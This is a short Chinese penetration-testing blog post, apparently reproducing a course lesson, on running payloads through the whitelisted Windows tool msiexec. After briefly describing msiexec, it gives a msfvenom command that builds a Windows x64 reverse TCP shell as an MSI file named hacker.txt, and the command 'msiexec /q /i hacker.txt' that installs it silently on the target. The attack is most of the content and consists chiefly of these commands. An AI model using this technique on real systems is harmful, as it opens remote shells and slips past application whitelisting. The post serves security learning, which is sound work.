渗透测试-基于白名单执行payload--Msiexec
2024-10-06 16:03:21
复现亮神课程 基于白名单执行payload--Msiexec
0x01 关于msiexec
Msiexec 是 Windows Installer 的一部分。用于安装 Windows Installer 安装包(MSI),一般在运行 Microsoft Update 安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于 Windows 2003,Windows 7 等。
说明:Msiexec.exe所在路径已被系统添加PATH环境变量中,因此,Msiexec命令可识别。
Windows 2003 默认位置:
C:\WINDOWS\system32\msiexec.exe C:\WINDOWS\SysWOW64\msiexec.exe
0x02 复现
Msf配置:
配置payload:
msfvenom -p windows/x64/shell/reverse_tcp LHOST= -f msi > hacker.txt
靶机执行:
C:\Users\Administrator\Desktop\Msiexec>msiexec /q /i hacker.txt
最新文章
- LINQ系列:LINQ to SQL Transact-SQL函数
- Python-基础-时间日期处理小结
- 一个超复杂的间接递归——C语言初学者代码中的常见错误与瑕疵(6)
- html之内联元素与块状元素;
- HQL: Hibernate查询语言
- 华为OJ平台——字符串通配符
- Public, Private and Protect
- c#用反射原理递归遍历复杂实体对象
- JDBC连接池的简单实现
- Nginx+Tomcat+Memcached实现tomcat集群和session共享
- iOS程序员的React Native开发工具集
- [2013-02-22]info入门FAQ
- 201521123012 《Java程序设计》第七周学习总结
- NOIP2016提高组初赛(C++语言)试题 个人的胡乱分析
- JS函数可以再添加属性(包括方法)
- webpack之带有可自动打开浏览器及热重载的基本配置
- oracle出现sga导致ORA-00821 ORA-00093报错解决办法
- 【织梦dedecms安全设置】dedecms如何防止被黑?dedecms被黑了怎么办?
- Python模块——configparser
- Java基础 【自动装箱和拆箱、面试题】
热门文章
- asp.net core razor自定义taghelper
- Yum未完成事务问题
- Java面试-容器的遍历
- C#中 CS1752无法嵌入互操作类型";OPCServerClass";。请改用适用的接口。
- oracle 11g 下载安装 使用记录
- JS中3种风格的For循环有什么异同?
- What skills you need to become a full stack java developer?
- Android Studio [水平布局LinearLayout]
- 《HelloGitHub》第 42 期
- mysql 查询常见时间段数据